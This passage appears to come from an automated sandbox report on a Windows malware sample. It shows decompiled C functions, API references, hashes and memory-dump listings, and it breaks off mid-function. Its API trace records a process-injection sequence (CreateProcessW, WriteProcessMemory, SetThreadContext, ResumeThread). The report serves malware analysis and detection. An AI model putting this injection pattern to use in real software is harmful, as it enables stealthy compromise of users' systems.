0x0043ba5d
0x0043ba60
0x0043ba67
0x0043ba6a
0x0043ba78

APIs

Part of subcall function 0040D8E0: ____lc_handle_func.LIBCMT ref: 0040D8E3
Part of subcall function 0040D8E0: ____lc_codepage_func.LIBCMT ref: 0040D8EB

std::_Locinfo::_Gettnames.LIBCPMT ref: 0043BA60
_free.LIBCMT ref: 0043BA70

Part of subcall function 00422BFA: HeapFree.KERNEL32(00000000,00000000,?,00427FDB,00000000,?,?,00427FF2,?,00423103,004027E5,B51EC2B3), ref: 00422C10
Part of subcall function 00422BFA: GetLastError.KERNEL32(00000000,?,00427FDB,00000000,?,?,00427FF2,?,00423103,004027E5,B51EC2B3), ref: 00422C22

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: ErrorFreeGettnamesHeapLastLocinfo::_____lc_codepage_func____lc_handle_func_freestd::_
String ID:
API String ID: 2104377502-0
Opcode ID: 59ac69349186c992ffcd85225d17ae2b8d91df94eab758bde09889295c8d2153
Instruction ID: 9e30beccd037cf90f5c5ec209a17cf602254cc4fbc23a531ea5a07d96568d3db
Opcode Fuzzy Hash: 59ac69349186c992ffcd85225d17ae2b8d91df94eab758bde09889295c8d2153
Instruction Fuzzy Hash: 33E04F76400308AFC324EF56D441A967BA8EF45360B00842FF65A4B250CBB9E940DBD8

Uniqueness

Uniqueness Score: -1.00%

Function 0042B55C Relevance: 1.6, APIs: 1, Instructions: 52
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E0042B55C(signed int _a4, signed int _a8, long _a12) {
				void* _t10;
				long _t11;
				long _t12;
				signed int _t13;
				signed int _t17;
				long _t19;
				long _t24;

				_t17 = _a4;
				if(_t17 == 0) {
					L3:
					_t24 = _t17 * _a8;
					__eflags = _t24;
					if(_t24 == 0) {
						_t24 = _t24 + 1;
						__eflags = _t24;
					}
					goto L5;
					L6:
					_t10 = RtlAllocateHeap( *0x463830, 8, _t24); // executed
					__eflags = 0;
					if(0 == 0) {
						goto L7;
					}
					L14:
					return _t10;
					goto L15;
					L7:
					__eflags =  *0x464454;
					if( *0x464454 == 0) {
						_t19 = _a12;
						__eflags = _t19;
						if(_t19 != 0) {
							 *_t19 = 0xc;
						}
					} else {
						_t11 = E00427E12(_t10, _t24);
						__eflags = _t11;
						if(_t11 != 0) {
							L5:
							_t10 = 0;
							__eflags = _t24 - 0xffffffe0;
							if(_t24 > 0xffffffe0) {
								goto L7;
							} else {
								goto L6;
							}
						} else {
							_t12 = _a12;
							__eflags = _t12;
							if(_t12 != 0) {
								 *_t12 = 0xc;
							}
							_t10 = 0;
						}
					}
					goto L14;
				} else {
					_t13 = 0xffffffe0;
					_t27 = _t13 / _t17 - _a8;
					if(_t13 / _t17 >= _a8) {
						goto L3;
					} else {
						 *((intOrPtr*)(E00425667(_t27))) = 0xc;
						return 0;
					}
				}
				L15:
			}

0x0042b561
0x0042b566
0x0042b583
0x0042b588
0x0042b58a
0x0042b58c
0x0042b58e
0x0042b58e
0x0042b58e
0x00000000
0x0042b596
0x0042b59f
0x0042b5a5
0x0042b5a7
0x00000000
0x00000000
0x0042b5db
0x0042b5dd
0x00000000
0x0042b5a9
0x0042b5a9
0x0042b5b0
0x0042b5ce
0x0042b5d1
0x0042b5d3
0x0042b5d5
0x0042b5d5
0x0042b5b2
0x0042b5b3
0x0042b5b9
0x0042b5bb
0x0042b58f
0x0042b58f
0x0042b591
0x0042b594
0x00000000
0x00000000
0x00000000
0x00000000
0x0042b5bd
0x0042b5bd
0x0042b5c0
0x0042b5c2
0x0042b5c4
0x0042b5c4
0x0042b5ca
0x0042b5ca
0x0042b5bb
0x00000000
0x0042b568
0x0042b56c
0x0042b56f
0x0042b572
0x00000000
0x0042b574
0x0042b579
0x0042b582
0x0042b582
0x0042b572
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0042554F,?,?,00000000,00000000,00000000,?,00427F9C,00000001,00000214), ref: 0042B59F

Part of subcall function 00425667: __getptd_noexit.LIBCMT ref: 00425667

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: 394dec172cdff67595a8f6590aa036585a7c86b947f4f4be2e9d30fc40fe8f2e
Instruction ID: ead741f4dd363b3a237f4a583245e020fea4f666e41f327587bc6c17922fe46a
Opcode Fuzzy Hash: 394dec172cdff67595a8f6590aa036585a7c86b947f4f4be2e9d30fc40fe8f2e
Instruction Fuzzy Hash: F70192313016356AEB299F25EC44B673795EF81768F444A2AF815CF290DB78DC8086D8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A2A8 Relevance: 1.5, APIs: 1, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 70%

			E0040A2A8(signed int __edi, signed int __esi) {
				intOrPtr _t13;
				intOrPtr _t14;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				signed int _t34;
				intOrPtr _t35;
				signed int _t36;
				intOrPtr _t37;
				signed int _t38;
				void* _t41;
				void* _t43;
				void* _t44;

				_t36 = __esi;
				_t34 = __edi;
				do {
					_t26 =  *0x4631f4; // 0xfff48ebd
					_t41 = _t36 -  *0x46320c; // 0x0
					if(_t41 >= 0) {
						_t22 =  *0x463200; // 0x211
						_t26 = _t26 + _t36 / (_t22 + 0x45) * _t34 -  *0x462f60 -  *0x4631fc +  *0x4631ec;
						 *0x4631f4 = _t26;
					}
					_t31 =  *0x462f5c; // 0x4770000
					_t43 = _t31 -  *0x4631dc; // 0x2ad58
					if(_t43 > 0) {
						_t14 =  *0x4631e8; // 0x789
						_t31 = _t36 + _t14;
						 *0x462f5c = _t36 + _t14;
					}
					_t44 = _t26 -  *0x460334; // 0xc30c4
					if(_t44 > 0) {
						_t13 =  *0x463204; // 0x4
						 *0x462f5c = _t13;
					}
					HideCaret(0);
					_t6 = _t38 - 0x4c;
					 *_t6 =  *((intOrPtr*)(_t38 - 0x4c)) - 1;
				} while ( *_t6 != 0);
				 *((intOrPtr*)(_t38 - 4)) = 0xfffffffe;
				 *[fs:0x0] =  *((intOrPtr*)(_t38 - 0x10));
				_pop(_t35);
				_pop(_t37);
				_pop(_t25);
				return E004230EF(0, _t25,  *(_t38 + 0x778) ^ _t38, _t31, _t35, _t37);
			}

0x0040a2a8
0x0040a2a8
0x0040a2b0
0x0040a2b0
0x0040a2b6
0x0040a2bc
0x0040a2be
0x0040a2e2
0x0040a2e4
0x0040a2e4
0x0040a2ea
0x0040a2f0
0x0040a2f6
0x0040a2f8
0x0040a2fd
0x0040a300
0x0040a300
0x0040a306
0x0040a30c
0x0040a30e
0x0040a313
0x0040a313
0x0040a31a
0x0040a320
0x0040a320
0x0040a320
0x0040a37c
0x0040a388
0x0040a390
0x0040a391
0x0040a392
0x0040a3a7

APIs

HideCaret.USER32(00000000), ref: 0040A31A

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: CaretHide
String ID:
API String ID: 388245924-0
Opcode ID: 202c41f79ad2db7ae587f1f7b1564fbdd79404db91da44faff7eecc7452c07f6
Instruction ID: c2d35d9c1603c0b788c1f0730812174e2148a9712c8ab085e5b090b106293613
Opcode Fuzzy Hash: 202c41f79ad2db7ae587f1f7b1564fbdd79404db91da44faff7eecc7452c07f6
Instruction Fuzzy Hash: 4111A130604641CFC718CF18EE91AA977B1F749302B10803ED41A973A5E7B5AA15DF0F

Uniqueness

Uniqueness Score: -1.00%

Function 04773994 Relevance: 1.5, APIs: 1, Instructions: 36processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 047739D9

Memory Dump Source

Source File: 00000000.00000002.291429509.0000000004773000.00000040.00001000.00020000.00000000.sdmp, Offset: 04773000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4773000_555.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 68170dbedf60d79808ed1d0aad79d744a4631ca2ec0e98486d57c970b00569e4
Instruction ID: 6c2cc02955be4ff9eeccd01df026cd67e255d90072af49f2254c0876f708a592
Opcode Fuzzy Hash: 68170dbedf60d79808ed1d0aad79d744a4631ca2ec0e98486d57c970b00569e4
Instruction Fuzzy Hash: 360142B5A04109AF8B44DF99D880CDEB7F9BF8C200B108659F918E3340D630E911CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04773A74 Relevance: 1.5, APIs: 1, Instructions: 26injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04773AA5

Memory Dump Source

Source File: 00000000.00000002.291429509.0000000004773000.00000040.00001000.00020000.00000000.sdmp, Offset: 04773000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4773000_555.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 4fa0ad7045ff97cd03b82ba034e63d3416a14549c4f2da3957e4b95a06317865
Instruction ID: 66d94849c7107234b04314047fe12428c0285f1eb8e89c9c1041cfbb7737a7a4
Opcode Fuzzy Hash: 4fa0ad7045ff97cd03b82ba034e63d3416a14549c4f2da3957e4b95a06317865
Instruction Fuzzy Hash: 4AF07FB5A0020DAF8B44DF98D8808AEBBB9FF4C200F108599FD19A3301D630AA10DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 047738C4 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 047738F8

Memory Dump Source

Source File: 00000000.00000002.291429509.0000000004773000.00000040.00001000.00020000.00000000.sdmp, Offset: 04773000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4773000_555.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: fa1f276663f86bc12a6ae40ae87e1499cd0bf6a166d7e0e0b77c959cb1982bb1
Instruction ID: 1d27c07e57267d5b722bb42f2962a9bff19fafdd543c69b3b737112506909c55
Opcode Fuzzy Hash: fa1f276663f86bc12a6ae40ae87e1499cd0bf6a166d7e0e0b77c959cb1982bb1
Instruction Fuzzy Hash: 87F074B5A0020DAFCB44DF98D8849AEBBF9FF4C200F108599F919D3301D630AA10DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04773A34 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 04773A65

Memory Dump Source

Source File: 00000000.00000002.291429509.0000000004773000.00000040.00001000.00020000.00000000.sdmp, Offset: 04773000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4773000_555.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 19a52d62ddf6ee7b8aad85fad0b98a285dbde8681d2e4ae94e6aa14ea2278c12
Instruction ID: 4ea08c8784eab1a0834e28b87643db7d8fe8410c70e12102b635c1e4dbd9e689
Opcode Fuzzy Hash: 19a52d62ddf6ee7b8aad85fad0b98a285dbde8681d2e4ae94e6aa14ea2278c12
Instruction Fuzzy Hash: 56F07FB5A0020DAF8B04DF98D8808AEBBB9FF4C200F108599F919A3311D630AA50DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 047739F4 Relevance: 1.5, APIs: 1, Instructions: 20threadCOMMON

Download Yara Rule

APIs

GetThreadContext.KERNELBASE(?,?), ref: 04773A19

Memory Dump Source

Source File: 00000000.00000002.291429509.0000000004773000.00000040.00001000.00020000.00000000.sdmp, Offset: 04773000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4773000_555.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: c38c0f187517d0629c5e7df26a778ecb84292a55f7fb3f89b5c29d5e1fa62b42
Instruction ID: fdbc728c608566b748a818c2685d53d071ae506fa0ebe36835842469d51726c2
Opcode Fuzzy Hash: c38c0f187517d0629c5e7df26a778ecb84292a55f7fb3f89b5c29d5e1fa62b42
Instruction Fuzzy Hash: FCE07579D0020CEF8B44EFD8C5448ADFBF5FF48200F108599EC18A7301D630AA10DB91

Uniqueness

Uniqueness Score: -1.00%

Function 04773AB4 Relevance: 1.5, APIs: 1, Instructions: 20threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,?), ref: 04773AD9

Memory Dump Source

Source File: 00000000.00000002.291429509.0000000004773000.00000040.00001000.00020000.00000000.sdmp, Offset: 04773000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4773000_555.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: bfb02cfce639a981163b83951b7725b74e5c39b62c458c7597157b402a440198
Instruction ID: a4f2c40816618ea8b0eaa959b9e6c67ebc1bb7234f3de717df98ef10dc4a264a
Opcode Fuzzy Hash: bfb02cfce639a981163b83951b7725b74e5c39b62c458c7597157b402a440198
Instruction Fuzzy Hash: F4E07579D0020CEF8B44EFE8C4449ADFBF5FF48200F108599EC18A7301D630AA10DB91

Uniqueness

Uniqueness Score: -1.00%

Function 04773AF4 Relevance: 1.5, APIs: 1, Instructions: 18threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 04773B15

Memory Dump Source

Source File: 00000000.00000002.291429509.0000000004773000.00000040.00001000.00020000.00000000.sdmp, Offset: 04773000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4773000_555.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 850e84dcc970fd39ed16a6a5a46e879b1f7e78fc30fa3b2f56d686b0e3e59503
Instruction ID: 9f8e6e9151f843ee234144dad4fe8ebbe0b42a36f3969bdce5710e1f43d9ba1d
Opcode Fuzzy Hash: 850e84dcc970fd39ed16a6a5a46e879b1f7e78fc30fa3b2f56d686b0e3e59503
Instruction Fuzzy Hash: 61E07574D00208AB8B04EFE8C54489DFBF4EB48200F1085A5E814A3301D630AA10DB91

Uniqueness

Uniqueness Score: -1.00%

Function 04773894 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?), ref: 047738B8

Memory Dump Source

Source File: 00000000.00000002.291429509.0000000004773000.00000040.00001000.00020000.00000000.sdmp, Offset: 04773000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4773000_555.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 0ad9a33765ced377264aca7d805757e7431dd39e17e803385d986b5197658df2
Instruction ID: 1427aa5668cf02e8e67120dc4df8f1930808c45b15f766aa867f6db3a38f55a8
Opcode Fuzzy Hash: 0ad9a33765ced377264aca7d805757e7431dd39e17e803385d986b5197658df2
Instruction Fuzzy Hash: 29E04C75D0420CABCB04DFD9D54599DFBF4EF48200F1081A5ED4497301E6306A50DB95

Uniqueness

Uniqueness Score: -1.00%

Function 0044C8ED Relevance: 1.5, APIs: 1, Instructions: 4
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0044C8ED() {
				void* _t1;

				_t1 = E0044C603(0); // executed
				return _t1;
			}

0x0044c8ef
0x0044c8f5

APIs

__Gettnames_l.LIBCMT ref: 0044C8EF

Part of subcall function 0044C603: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0044C616
Part of subcall function 0044C603: _strlen.LIBCMT ref: 0044C62E
Part of subcall function 0044C603: _strlen.LIBCMT ref: 0044C639
Part of subcall function 0044C603: _strlen.LIBCMT ref: 0044C665
Part of subcall function 0044C603: _strlen.LIBCMT ref: 0044C66F
Part of subcall function 0044C603: _strlen.LIBCMT ref: 0044C68E
Part of subcall function 0044C603: _strlen.LIBCMT ref: 0044C69B
Part of subcall function 0044C603: _strlen.LIBCMT ref: 0044C6AC
Part of subcall function 0044C603: _strlen.LIBCMT ref: 0044C6BB
Part of subcall function 0044C603: _strlen.LIBCMT ref: 0044C6CA
Part of subcall function 0044C603: __malloc_crt.LIBCMT ref: 0044C6DA
Part of subcall function 0044C603: _memmove.LIBCMT ref: 0044C6F9
Part of subcall function 0044C603: _strcpy_s.LIBCMT ref: 0044C726
Part of subcall function 0044C603: _strlen.LIBCMT ref: 0044C733

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: _strlen$Locale$Gettnames_lUpdateUpdate::___malloc_crt_memmove_strcpy_s
String ID:
API String ID: 652669937-0
Opcode ID: 5fed75fba72a53bc16913a741cd1ada0a3eab56b2504024e58554b9988f1b64e
Instruction ID: b62997dea19d3767b0410dd0fb5a04505adbe28cc369211823ae58ceff3cdedb
Opcode Fuzzy Hash: 5fed75fba72a53bc16913a741cd1ada0a3eab56b2504024e58554b9988f1b64e
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00427E3A Relevance: 1.5, APIs: 1, Instructions: 3COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000,0043505E,00463D20,00000314,00000000,?,?,?,?,?,0042D087,00463D20,Microsoft Visual C++ Runtime Library,00012010), ref: 00427E3C

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 6c847d5ef7434a7b9fa19eedcb67cd87b3b438ecf66edefbeb25ef4dc149a039
Instruction ID: b565a4defeffc2fe8236a9e37909e3d34ed778a47e9a962951269c7a3f361102
Opcode Fuzzy Hash: 6c847d5ef7434a7b9fa19eedcb67cd87b3b438ecf66edefbeb25ef4dc149a039
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 04773B54 Relevance: 1.3, APIs: 1, Instructions: 18memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 04773B77

Memory Dump Source

Source File: 00000000.00000002.291429509.0000000004773000.00000040.00001000.00020000.00000000.sdmp, Offset: 04773000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4773000_555.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 085bbbb1b2daa810762bcbdea66021481b1dc04bde9b9c15a87ec4ab70e4eaaf
Instruction ID: 7d3c7a8436bdabb11050f779481bb5f182366ace98280796b5974d5702647f8f
Opcode Fuzzy Hash: 085bbbb1b2daa810762bcbdea66021481b1dc04bde9b9c15a87ec4ab70e4eaaf
Instruction Fuzzy Hash: 72E07E7590020CAFCF05DF94D94589DBBB5EB08210F1080AAED14A7311E631AA20EB91

Uniqueness

Uniqueness Score: -1.00%

Function 04770570 Relevance: 1.3, APIs: 1, Instructions: 18memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 04770593

Memory Dump Source

Source File: 00000000.00000002.291392046.0000000004770000.00000040.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4770000_555.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d23f5b4491c7af0992820b7baa5db14a80b82636fbc31ebfbd540f84cb94a2fc
Instruction ID: a1f2d1ccd8cff80412d1d48a67333727334e79d40cf6222f914b1220adc2bc82
Opcode Fuzzy Hash: d23f5b4491c7af0992820b7baa5db14a80b82636fbc31ebfbd540f84cb94a2fc
Instruction Fuzzy Hash: B9E07E7590020CAFCF01DF98D94589DBBB5EB08210F00809AED14A6311D631AA20AB91

Uniqueness

Uniqueness Score: -1.00%

Function 04773B24 Relevance: 1.3, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 04773B44

Memory Dump Source

Source File: 00000000.00000002.291429509.0000000004773000.00000040.00001000.00020000.00000000.sdmp, Offset: 04773000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4773000_555.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 5e781ff520f4ad1647cdc0c93c54a84aa4ce908d23944f38bbc909f0000f57cd
Instruction ID: ba5d3bb6d2c09628febbc076ce336478037d02dd08395c5da33e1fd91825cdf0
Opcode Fuzzy Hash: 5e781ff520f4ad1647cdc0c93c54a84aa4ce908d23944f38bbc909f0000f57cd
Instruction Fuzzy Hash: C8E00275D4020CEFCF05DF94D94599DBBB5EB18210F1081A9ED1497311E631AA60EB91

Uniqueness

Uniqueness Score: -1.00%

Function 04770540 Relevance: 1.3, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 04770560

Memory Dump Source

Source File: 00000000.00000002.291392046.0000000004770000.00000040.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4770000_555.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 5f66c99753e64f02ff2b462dafc4f8f36d502f87b07fb646d32efc9fa3abc917
Instruction ID: acf3c2245710cb7f500a4b0cd00703ce149e2ac9f099c921b6ef19ef7b38b84d
Opcode Fuzzy Hash: 5f66c99753e64f02ff2b462dafc4f8f36d502f87b07fb646d32efc9fa3abc917
Instruction Fuzzy Hash: 6EE00275D4024CEF8F05DF98D94599DBBB5EB18210F108199ED1497311D631AA60DB91

Uniqueness

Uniqueness Score: -1.00%

Function 04773B94 Relevance: 1.3, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNELBASE(?,?), ref: 04773BB1

Memory Dump Source

Source File: 00000000.00000002.291429509.0000000004773000.00000040.00001000.00020000.00000000.sdmp, Offset: 04773000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4773000_555.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: d9dbb09c891248fb492e84d6ee1137854c286d7ceabbc482e996dedf0a7563e9
Instruction ID: 11d17965e141b092615866ff96d2b95bcdaf503fdf964616fae24ade01bbc97a
Opcode Fuzzy Hash: d9dbb09c891248fb492e84d6ee1137854c286d7ceabbc482e996dedf0a7563e9
Instruction Fuzzy Hash: BDE02675D0010CAFCF45EF94D54589CFBB5EB08210F1081A6EC5497311E6316A54DB91

Uniqueness

Uniqueness Score: -1.00%

Function 047704E0 Relevance: 1.3, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNELBASE(?,?), ref: 047704FD

Memory Dump Source

Source File: 00000000.00000002.291392046.0000000004770000.00000040.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4770000_555.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: eda64a455f148b8a09e352fe24c13dc281b9b593ee549f94b6634f8ab68eaba8
Instruction ID: 52438fabaad323a63577bb2fe99bc657eb32a38179ee6946e935297fa7c05f17
Opcode Fuzzy Hash: eda64a455f148b8a09e352fe24c13dc281b9b593ee549f94b6634f8ab68eaba8
Instruction Fuzzy Hash: 10E02D79D0020CAF8B40EFA8D54989DFBB5EB08210F1081AAED58A7311E631AA649B91

Uniqueness

Uniqueness Score: -1.00%

Function 04770510 Relevance: 1.3, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GlobalFree.KERNELBASE(?), ref: 0477052A

Memory Dump Source

Source File: 00000000.00000002.291392046.0000000004770000.00000040.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4770000_555.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: b096a49ce29544fdcdf10be10ffc4b9b37b73a5378acb49dc39f58e04ef0f93a
Instruction ID: 54da090bb65392d774862a937fd702cdee75951c50542ff64675723d46547fac
Opcode Fuzzy Hash: b096a49ce29544fdcdf10be10ffc4b9b37b73a5378acb49dc39f58e04ef0f93a
Instruction Fuzzy Hash: C7D04275D0020CAFCB40EFA8D54589DFBB4EB08210F1081AAED14A7311E6316E509B91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00405900 Relevance: 14.9, APIs: 2, Strings: 6, Instructions: 894
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E00405900() {
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t290;
				intOrPtr* _t291;
				intOrPtr _t293;
				intOrPtr _t295;
				intOrPtr _t297;
				intOrPtr _t308;
				intOrPtr* _t309;
				intOrPtr _t311;
				intOrPtr _t313;
				intOrPtr _t315;
				intOrPtr _t326;
				intOrPtr* _t327;
				intOrPtr _t329;
				intOrPtr _t331;
				intOrPtr _t333;
				intOrPtr _t344;
				intOrPtr* _t345;
				intOrPtr _t347;
				intOrPtr _t349;
				intOrPtr _t351;
				intOrPtr _t362;
				intOrPtr _t365;
				signed int _t367;
				signed int _t372;
				intOrPtr _t379;
				signed int _t384;
				signed int _t390;
				signed int _t396;
				signed int _t402;
				signed int _t408;
				intOrPtr _t415;
				signed int _t418;
				signed int _t424;
				signed int _t430;
				signed int _t436;
				signed int _t442;
				intOrPtr _t449;
				signed int _t452;
				signed int _t458;
				signed int _t464;
				signed int _t470;
				signed int _t476;
				intOrPtr _t483;
				signed int _t486;
				signed int _t492;
				signed int _t498;
				signed int _t504;
				signed int _t510;
				intOrPtr _t519;
				signed int _t522;
				intOrPtr _t527;
				intOrPtr* _t528;
				intOrPtr* _t530;
				intOrPtr* _t532;
				intOrPtr* _t534;
				intOrPtr* _t536;
				intOrPtr _t537;
				void* _t544;
				void* _t548;
				void* _t552;
				void* _t556;
				void* _t563;
				void* _t567;
				void* _t571;
				void* _t575;
				void* _t582;
				void* _t586;
				void* _t590;
				void* _t594;
				void* _t601;
				void* _t605;
				void* _t609;
				void* _t613;
				void* _t620;
				void* _t624;
				void* _t630;
				void* _t639;
				void* _t648;
				void* _t657;
				void* _t666;
				signed int _t724;
				signed int _t725;
				intOrPtr* _t726;
				signed int _t727;
				signed int _t728;
				signed int _t729;
				signed int _t730;
				intOrPtr* _t731;
				signed int _t732;
				signed int _t733;
				signed int _t734;
				signed int _t735;
				intOrPtr* _t736;
				signed int _t737;
				signed int _t738;
				signed int _t739;
				signed int _t740;
				intOrPtr* _t741;
				signed int _t742;
				signed int _t743;
				signed int _t744;
				signed int _t745;
				signed int _t746;
				intOrPtr* _t747;
				intOrPtr* _t748;
				signed int _t749;
				signed int _t750;
				signed int _t751;
				signed int _t752;
				signed int _t753;
				signed int _t754;
				signed int _t755;
				signed int _t756;
				signed int _t757;
